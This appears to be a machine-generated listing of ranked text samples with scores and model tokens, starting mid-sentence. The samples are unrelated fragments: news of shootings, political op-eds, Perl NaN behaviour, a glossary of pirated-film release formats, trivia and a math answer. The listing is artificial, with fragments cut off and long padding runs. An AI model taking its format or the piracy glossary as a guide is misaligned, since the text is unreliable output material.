the boy, and his mother, who was due home later that afternoon, would both be dead. + +According to reports the young boy, who is not being identified, was home alone when he grew suspicious of a car that pulled up outside around 1:30 p.m. Moments later, the two suspects went to the back of the house and attempted to break in, at such time, the boy, fearing for his safety, grabbed his mother’s handgun. + +take our poll - story continues below + +Will the media learn anything from their biased reporting of the Jussie Smollett story? Will the media learn anything from their biased reporting of the Jussie Smollett story? + +Will the media learn anything from their biased reporting of the Jussie Smollett story? * Yes, they've gotten so much wrong recently that they're bound to be on their best behavior. No, they suffer from a bad case of Trump Derangement Syndrome. Jussie who? + +Email * + +Name This field is for validation purposes and should be left unchanged. Completing this poll grants you access to Truth Uncensored updates free of charge. You may opt out at anytime. You also agree to this site's Privacy Policy and Terms of Use. + +As the suspects tried to break into the back of the house, the boy opened fire, but the suspects reacted by returning fire before fleeing from the scene. + +The boy chased the suspects out of the home and continued to fire as they fled in their vehicle. The boy, who was uninjured, then called his mother, who instructed him to call the police. + +Neighbor Debbie Griffin said she called police after hearing about six shots ring out. She added that +================================================================================ +Rank = 51; Score = 458752.0 +<|begin_of_text|>The current U.S. population is about 317 million. The current number of employed American workers is 144 million. + +According to the Bureau of Labor Statistics, among those paid by the hour, 1.6 million Americans earned the prevailing federal minimum wage of $7.25 per hour in 2012. (The data for 2013 hasn’t been released yet.) Of these, 484,000 are aged 16 to 19. + +So... the Democrats’ big idea on income inequality is one that will increase wages for... 1.1 percent of the workforce. + +The federal minimum wage is $7.25 per hour, although many states and localities require a higher wage by law. SeaTac, the municipality that surrounds Seattle-Tacoma International Airport, now requires $15 per hour. Democrats want to raise the federal minimum wage to $10.10 per hour, an additional $2.85 per hour. + +For a minimum-wage employee working 40 hours per week, that’s an additional $114 per week, before taxes. + +For a 30-hour-per-week worker, we’re talking about an additional $85.50 per week. + +With 1.6 million earning the federal minimum wage, averaging 35 hours per week, this would amount to $159.6 million in higher wages per week. That, times 52 weeks per year, amounts to about $8.2 billion. That may sound like a lot, but we have a $17 trillion economy. + +In short, an America with a $10.10-per-hour minimum wage would look indistinguishable from the one we see today on the issue of income inequality, as well as the economic aspect that more conservatives focus on, opportunity for advancement. (Getting that first entry-level, minimum wage may get harder as each employee becomes more expensive to the employer.) The workers making minimum wage may very well appreciate the extra $85 to $114 per week, but it’s not going to have much of an impact on their purchasing power. Small companies on tight margins may find the $2.85-per-worker-per-hour cost more difficult to handle, or may raise prices. Of course, if prices go up... that will eat into the budgets of those minimum-wage workers pretty fast, won’t it?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 456704.0 +<|begin_of_text|>Perl has some “numbers” that aren’t really numbers. Or, it has them if your underlying C library supports them. + +The first, the “not a number”, is the string “NaN”, in any case. This isn’t a single value. The standard for floating-point numbers, IEEE 754. This value, which isn’t a number, returns itself in any mathematical operation. + +Before we look at that, though, remember what Perl does with strings that might be numbers. As we explain in the “Scalars” chapter, Perl grabs decimal number characters from the start of the string. When it encounters something that doesn’t look like it belongs in a decimal number, it stops. Whatever it grabbed so far becomes the number. For instance, "1234fred" becomes 1234 while "fred" becomes the empty string which becomes 0. + +$ perl -le 'print "1234fred" + 1' 1235 $ perl -le 'print "fred" + 1' 1 $ perl -le 'print "1234fred" * 1' 1234 $ perl -le 'print "fred" * 1' 0 + +NaN + +If we applied Perl’s basic rule to the string "NaN", we’d expect to get 0, because we didn’t tell you about this special value in Learning Perl. It’s one of the white lies we tell so we don’t fill your head with stuff you probably won’t need. Now here’s some stuff you might not need: + +$ perl -le 'print "NaN" + 1' nan $ perl -le 'print "NaN" * 1' nan $ perl -le 'print log( "NaN" )' nan $ perl -le 'print sin( "NaN" )' nan + +Any calculations we try to do with this value turns the rest of the results into "NaN". It won’t accidentally turn into 0, making you think that your calculation is accurate or destroying all values in multiplication. + +But, it gets trickier. It’s more than just the string "NaN" that turns into this special value. Any string that starts with "NaN" also turns into “not a number”: + +$ perl -le 'print "Nandor" + 1' nan + +Is that it? Not quite. Perl will allow ignore a leading + or - sign as well: + +$ perl -le 'print "+NaN"' nan $ perl -le 'print "-Nandor"' +================================================================================ +Rank = 53; Score = 452608.0 +<|begin_of_text|>A cam is ausually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera make shake. Also seating placement isn’t always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there’s text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from theof the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes, and the theater will be fairly empty and a fairly clear signal will be heard.A telesync is the same spec as a CAM except it uses(most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release.A telecine machine copies the film digitally from the. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, althoughtelecines have existed. A great example is thedone a few years ago. TC should not be confused with TimeCode, which is a visible counter on screen throughout the film., sent to rental stores, and various other places for promotional use. A screener is supplied on a VHS tape, and is usually in a 4:3 (full screen) a/r, although letterboxed screeners are sometimes found. The main draw back is a “ticker“ (a message that scrolls past at the bottom of the screen, with the copyright and anti-copy telephone number). Also, if the tape contains any serial numbers, or any other markings that could lead to the source of the tape, these will have to be blocked, usually with a black mark over the section. This is sometimes only for a few seconds, but unfortunately on some copies this will last for the entire film, and some can be quite big. Depending on the equipment used, screener quality can range from excellent if done from a MASTER copy, to very poor if done on an old VHS recorder thru poor capture equipment on a copied +================================================================================ +Rank = 54; Score = 446464.0 +<|begin_of_text|>Share + +The Barbeque Stove Bolt Special. Photos by Robin Adams, courtesy RM Auctions. + +The rules of hot rodding have long been this: there are no rules. Perhaps no single car in hot rod history has embraced that belief better than the Barbeque Stove Bolt Special, a 1951 custom built with parts from 16 cars, two motorcycles and an airplane. Next week, this monument to ingenuity will cross the block in Phoenix as part of RM’s Arizona sale. + +While it’s not uncommon to see Deuce Coupes sporting small-block Chevy engines, the Barbeque Stove Bolt Special goes much, much farther than this. In fact, it’s hard to identify the car by a single brand, or even by two brands. The frame started life under a 1927 Chevrolet, while much of the body (excluding the hand-built pickup bed) came from a 1921 Dodge touring car, except for the grille, which was pulled from a 1932 Ford. Power comes from a 1928 Chevrolet four-cylinder block, stuffed full of a 1932 Ford crankshaft, 1936 Pontiac connecting rods, a set of Jahns pistons and capped by a Harry Miller-modified 1930 Oldsmobile three-port head fitted with Buda diesel valves and Nash rocker arms. Carburetors are SUs, liberated from an unspecified Jaguar (or SS) model, while the dry-sump oiling system was engineered by the builders. + +The builders, in this case, were James H. Hill and his father, Clark Hill, originally of Vallejo, California. Knowing that such radical modifications would tax the strength of the block, the Hills built up the block using 26 pounds of welding rod and six tanks of acetylene gas; to ensure even and complete cooling (and thus reduce the chances of warping), the hot, welded block was cured for four days in a charcoal bed in the family’s barbeque, and the custom’s name was born. + +Following the car’s completion in 1951, it was campaigned on dry lakes in land speed record competition. The California-Nevada Timing Association clocked the Frankenrod at a speed of 84.4 MPH, which the Hills later assured Honk magazine (the predecessor to Car Craft) was due to its unfavorable 2.54:1 gearing. There’s no record of a higher top speed with reduced gearing, but the one-of-a-kind custom also proved its worth at the +================================================================================ +Rank = 55; Score = 440320.0 +<|begin_of_text|>Geography + +One-tenth the size of New York City, San Marino is surrounded by Italy. It is situated in the Apennines, a little inland from the Adriatic Sea near Rimini. + +Government + +Republic. + +History + +According to tradition, San Marino was founded about A.D. 350 and had the good luck for centuries to stay out of the many wars and feuds on the Italian peninsula. It is the oldest republic in the world. San Marino has survived, completely intact, attacks by other self-governing Italian city-states, the Napoleonic Wars, the unification of Italy, and two world wars. Those born in San Marino remain citizens and can vote no matter where they live. It joined the United Nations in 1992. + +According to tradition, San Marino was founded about A.D. 350 and had the good luck for centuries to stay out of the many wars and feuds on the Italian peninsula. It is the oldest republic in the world. San Marino has survived, completely intact, attacks by other self-governing Italian city-states, the Napoleonic Wars, the unification of Italy, and two world wars. Those born in San Marino remain citizens and can vote no matter where they live. It joined the United Nations in 1992. + +The Captains Regent, an elected pair, serves as San Marino's heads of state. The two people are elected every six months by the Grand and General Council of San Marino. Each new pair takes office the first day of every April and October. As of Oct. 1, 2015, the current two heads of state and government are Lorella Stefanelli and Nicola Renzi. + +See also Encyclopedia: San Marino. + +U.S. State Dept. Country Notes: San Marino<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 56; Score = 434176.0 +<|begin_of_text|>+1 6K Shares + +Three people died and two were injured in a shooting Wednesday morning at an Edgewood, Md., area business park, the Harford County sheriff said. + +The shooting occurred around 8:58 a.m. at Advanced Granite Solutions, and sheriff’s deputies were on the scene within four minutes, according to Sheriff Jeffrey Gahler. All five people were shot with a handgun, and are employees of the business, Gahler said. + +“This does appear to be a targeted attack, limited to that business,” Gahler said at an 11:10 a.m. news conference. + +Gahler identified the suspect as 37-year-old Radee Labeeb Prince, who he said was connected to the business. + +“What that association is, that’s still under investigation,” Gahler said. + +ADVERTISEMENT + +The suspect left the scene in a black 2008 GMC Acadia with Delaware tags, the sheriff said. A residence in Cecil County was searched as part of the investigation, he said. + +“We do not believe that anybody else was involved in this incident,” Gahler said. + +Two patients from the shooting were in critical condition at Shock Trauma, University of Maryland Medical System officials said Wednesday morning. + +A modified lockdown has been lifted from those Harford County schools in the Edgewood area that were placed under precautions earlier in the day, district officials said. + +“There’s an individual out there on the loose who’s committed one of the most heinous acts in our county. We certainly consider him armed and dangerous,” Gahler said. + +According to Advanced Granite Solution’s website, the company designs, manufactures and installs granite, marble and stone countertops and other surfaces in Maryland, Pennsylvania and Delaware. + +Prince had several prior arrests and run-ins with law enforcement, court records show. + +ADVERTISEMENT + +In December 2003, he pleaded guilty in Delaware to 15 counts of third-degree burglary and was sentenced to 25 years with all but two years suspended, court records show. He was ordered to pay $34,500 in restitution, the records show. + +He was charged with several handgun counts in March 2015 in Cecil County, including being a felon in possession of a firearm and carrying a handgun in vehicle; those charges were dropped by Cecil County prosecutors about three months later. + +In February, a peace order — Maryland’s equivalent of a restraining order — was taken out against him in Harford County but was denied. Details of the case were not immediately available. + +The Sheriff’s Office posted on its Twitter +================================================================================ +Rank = 57; Score = 434176.0 +<|begin_of_text|>$\begingroup$ + +Hmm, if we look at $g(x) = f(f(x)) = x^2-2$ and find the fixpoints $t_0=-1,t_1=2$ then we might assume a solution $h(x)$ for $g(x) = h(x-2)+2 $ and then from this we search for the half-iterate of $h(x)$ defining $h(x-2)+2 = w(w(x-2))+2$ and shall have a solution of the problem by $f(x)=w(x+2)-2$, hopefully having nonzero range of convergence at least in the vicinity of the fixpoint $t_1$. + +With this ansatz we find that $$h(x) = g(x+2)-2 = (x+2)^2-4 = 4x+1x^2$$ could be a replacement for $g(x)$ and from this we get the leading terms for the power series of its half-iterate $$w(x) = 2 x + 1/6 x^2 - 1/90 x^3 + 1/720 x^4 - 7/32400 x^5 \\ + 161/4276800 x^6 - 391/55598400 x^7 + O(x^8) $$ by standard algebraic manipulations. (To check this insert $w(x)$ for $x$ in that leading terms) + +Thus $f(x)$ can be written as a power series around (fixpoint) $2$: $$f(x) = 2+ 2 (x-2) + 1/6 (x-2)^2 - 1/90 (x-2)^3 + 1/720 (x-2)^4 - 7/32400 (x-2)^5 \\ + 161/4276800 (x-2)^6 - 391/55598400 (x-2)^7 + O(x^8) $$ (The link gives a confirmation using WolframAlpha and a $\cosh()$ /$\text{arccosh}()$-formula, see my other answer) + +By the first $64$ terms it looks as if $w(x)$ has a positive range of convergence; and computing a couple of examples gives $$ \begin{array} {c|c|c|c} x &g(x)=h(1-t_1)+t_1 & f(x) = w +================================================================================ +Rank = 58; Score = 434176.0 +<|begin_of_text|>How much is 1 byte, kilobyte, megabyte, gigabyte, etc.? + +Below is a list of each of the accepted disk drive space values. It is important to realize that not all manufacturers and developers list their value using binary, which is base 2. For example, a manufacturer may list a product's capacity as one gigabyte (1,000,000,000 bytes, a metric value) and not 1,073,741,824 bytes (gibibyte) that it actually is. For this page, we are using the "common names" and listing all values in base 2. + +Note: All values are listed as whole numbers, which means a GB shows it can only contain one 650 MB CD. Technically, 1 GB could hold 1.5753 CDs worth of data, but this document isn't meant to show you how many "parts" of an object a value can hold. Therefore, we are omitting decimal values. More plainly, you can only fit one complete 650 MB CD on a 1 GB drive since two full 650 MB discs exceed 1 GB. + +Tip: Except for a bit and a nibble, all values explained below are in bytes and not bits. For example, a kilobyte (KB) is different than a kilobit (Kb). When referring to storage, bytes are used whereas data transmission speeds are measured in bits. + +Bit + +A bit is a value of either a 1 or 0 (on or off). + +Nibble + +A nibble is 4 bits. + +Byte + +Today, a byte is 8 bits. + +1 character, e.g., "a", is one byte. + +Kilobyte (KB) + +A kilobyte is 1,024 bytes. + +2 or 3 paragraphs of text. + +Megabyte (MB) + +A megabyte is 1,048,576 bytes or 1,024 kilobytes. + +873 pages of plain text (1,200 characters). + +pages of plain text (1,200 characters). 4 books (200 pages or 240,000 characters). + +Gigabyte (GB) + +A gigabyte is 1,073,741,824 (230) bytes. 1,024 megabytes, or 1,048,576 kilobytes. + +894,784 pages of plain text (1,200 characters). + +pages of plain text (1,200 characters). 4,473 books (200 pages or 240,000 +================================================================================ +Rank = 59; Score = 432128.0 +<|begin_of_text|>Alexandre Saba’s Website | Alexandre on Twitter + +IN FIVES + +1) Starting with the word “one” and increasing by increments of one thereafter, list 5 points that describe yourself. one apple a day… + +two rainbows makes me sound crazy + +three plugins is all I need + +four trainings a week, rain, snow or shine + +five days isn’t enough 2) If you could have a five-finger discount on any piece of software, what would it be? Nuendo 3) Describe what the number 5 would sound like if it were in human form. 5 looks red and red sounds harsh. Probably needs a de-esser as well. + +IN FOURS + +1) If you were to replace one of the Beatles, who would it be? Who would you put in his place? Paul McCartney with Michael Jackson and rename the group to The Beat Its. 2) What are your four favorite sound design tools? Human voice, Portable recorders, DSP, Automation 3) Finish the countdown: 4…3…2…1… Zero. + +IN THREES + +1) What are three reasons you’re working with sound? When done right, it’s the greatest thing on earth! It sways peoples emotions. One day get a 3×5 interview. 2) Of the following, what would you buy if you had a spare $100 and why? 3-piece suit, 3 super cheap mics, 3 blind mice? 3 super cheap mics hoping they’re “cheap” because they’re on sale. 3) What are three games that are your go-to examples for great sound design? GTA IV Half- Life 2 Mass Effect, all of them + +IN TWOS + +1) Two issues that invariably come up when working are… + +Things break + +Roadmap changes + +2) What are two pieces of advice you would give to someone eager to get into sound design? + +Make your demo sound better than the people you’re sending them to. + +Don’t tell them it’s better. + +3) Finish the line: “Two sound designers walk into a bar…” + +One of them puts earplugs in, the other gets shit faced and laughs. + +IN ONES<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 60; Score = 432128.0 +<|begin_of_text|>Ordering Numbers Least to Greatest Activity 1: Arrange the given numbers in ascending order or from the smallest to the largest. + +Click to Read More + +Do you know what ‘Ascending Order’ means? We say the numbers are in ascending order, when the numbers are arranged from the smallest to the largest. In this way we place the numbers in an increasing order. For example, look at these numbers; 49, 23, 107, 95 and 77. How to arrange these numbers in ascending order? First pick up the smallest out of all the given numbers. Then the second smallest, and so on until the largest. Likewise, in the given series of numbers 23, 49, 77, 95 and 107 are arranged in ascending order. With these online worksheets you can improve your ability in ordering numbers in ascending order by arranging numbers from the smallest to the largest. Learn ascending order by arranging numbers from least to greatest. Enjoy ordering numbers in ascending order!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 61; Score = 428032.0 +<|begin_of_text|>Democrats may be spending themselves (and the country) into oblivion, but some Republicans are not doing much better. The fiscal irresponsibility is pervasive, appearing not only in the party’s national leadership, but also among state legislators. prefix = o ns = "urn:schemas-microsoft-com:office:office" / Oh, sure. Republicans have put up a good front recently, objecting strenuously to the flood of spending by Democratic lawmakers. Some of their horror is doubtless genuine. Spending during Obama/Pelosi/Reid’s (as yet short) reign has increased at unprecedented levels. The nation is facing record spending and deficits—and OPR have only just begun. But it is easy for Republicans to take a purely partisan stance against Democratic spending. If they want to regain the trust of voters, they must do more. They must demonstrate their ability (and willingness) to do better. They must not only reverse recent Democratic excesses, but they must also reverse their own recent excesses. Unfortunately, it does not seem that many in the current Republican leadership have the will to take such a stand. Consider the fact that Republican National Chairman Michael Steele has spent twice as much as his predecessors, as recently reported by Politico. It would be one thing if he were spending all that money on campaign ads and get-out-the-vote efforts. But he’s not. He’s paying for limousines, world-class caterers, private airplanes—even an annual RNC meeting in Hawaii. The exodus of Republican donors during his tenure emphasizes the recklessness of his spending—and the irresponsibility of anyone in Republican leadership who is not taking action against such lack of discipline. Why should voters trust leaders like Steele with federal tax dollars when these leaders are so thoughtless with private donations? But the problem does not stop with a few spendthrift national leaders. This fiscal irresponsibility extends even to conservative states like Texas. Naturally, the election year has prompted some Republican officials to make big, splashy, headline-grabbing displays of fiscal conservatism. Well, terrific, but these same officials also made many terrible, fiscally irresponsible decisions earlier, during non-election years. Voters are thus being asked to take a leap of faith: Trust that the conservative, election-year version of these officials remain. Hope that the big government, spendthrift version of these officials will not return after the election. In general, Texas has received much praise for being fiscally conservative, but let’s face it. Texas is being graded on a +================================================================================ +Rank = 62; Score = 428032.0 +<|begin_of_text|>Which State Has The Highest Percentage of Forest Cover? + +Which state has the most forest land in the US, and which have made protecting evergreen wildlife a priority? Interestingly, there’s a pretty big gap between the two! The most forested state by far is Maine at 89% forest coverage, whereas the home to the largest national park in the US is Alaska. The Last Frontier is home to seven of the 10 largest US national park areas in size, with the largest being Wrangell-St. Elias. Which state has the most trees? It’s hard to say, since all trees have different sizes, but Maine is the most likely contender, with its relatively smaller pines. Its nickname is the Pine Tree State, after all, and its forest cover may relate to the fact that it’s the least densely populated state on the East Coast. While Maine is the state with the most trees, many others low on the list, like California, have made forest protection a priority. Check out our map to see more info besides which state has the largest area under forest. + +Which state has the most national parks? What is the largest national park? If you find yourself asking these questions about the national parks in the United States, check out the map below! Surprisingly the majority of the largest parks are in Alaska. This is most likely due to the fact that it was one of the last territories to become a state and its low population. How many state parks and national parks have you visited? + +Want to display this infographic on your website? You can copy the below code and paste it into your website.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_